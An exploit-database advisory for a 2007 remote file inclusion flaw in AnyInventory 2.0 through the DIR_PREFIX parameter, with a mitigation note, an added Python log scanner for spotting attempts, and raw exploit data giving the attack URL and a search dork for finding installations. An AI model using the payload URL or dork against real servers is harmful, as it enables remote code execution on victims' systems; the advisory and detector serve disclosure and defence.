Vendor: AnyInventory
By: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: Remote file inclusion
Product Name: AnyInventory
Affected Version From: AnyInventory 2.0
Affected Version To: AnyInventory 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AnyInventory => 2.0 Remote file inclusion

AnyInventory version 2.0 is vulnerable to remote file inclusion through the 'DIR_PREFIX' parameter of 'environment.php'. By supplying the location of a malicious file in this parameter, an attacker can have that file included and execute arbitrary code on the victim's system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of AnyInventory or implement proper input validation and sanitization to prevent file inclusion attacks.
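
One way to look for attempts against this parameter in web server access logs, as an added example that is not part of the original advisory or of AnyInventory. The log lines are constructed, and treating any client-supplied DIR_PREFIX on environment.php as suspicious is an assumption based on the description above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses, hosts and paths are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2007:10:01:02 +0000] "GET /inventory/index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Sep/2007:10:02:11 +0000] "GET /inventory/environment.php?DIR_PREFIX=http://files.example.net/x.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [05/Sep/2007:10:02:40 +0000] "GET /inventory/environment.php?DIR%5FPREFIX=%68ttp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 312',
    '198.51.100.4 - - [05/Sep/2007:10:03:00 +0000] "GET /inventory/environment.php?DIR_PREFIX=../ HTTP/1.1" 200 0',
    '198.51.100.5 - - [05/Sep/2007:10:04:00 +0000] "GET /inventory/search.php?q=DIR_PREFIX HTTP/1.1" 200 900',
]

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starts with a URL scheme (http:, ftp:, php:, ...), "//" or a UNC prefix.
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.IGNORECASE)


def classify(line):
    """Return (client, verdict, value) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/environment.php"):
        return None
    # parse_qs percent-decodes names and values, so encoded variants match too.
    values = parse_qs(parts.query, keep_blank_values=True).get("DIR_PREFIX")
    if not values:
        return None
    value = values[-1]  # PHP keeps the last value when a name is repeated
    # Assumption: DIR_PREFIX is never legitimately set by the client, so any
    # value is worth review; a URL-like value is an inclusion attempt.
    verdict = "remote-include" if SCHEME_RE.match(value) else "param-tamper"
    return client, verdict, value


def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{verdict:15} {client:15} DIR_PREFIX={value!r}")
```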

Exploit-DB raw data:

#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# milw0rm.com [2007-09-05]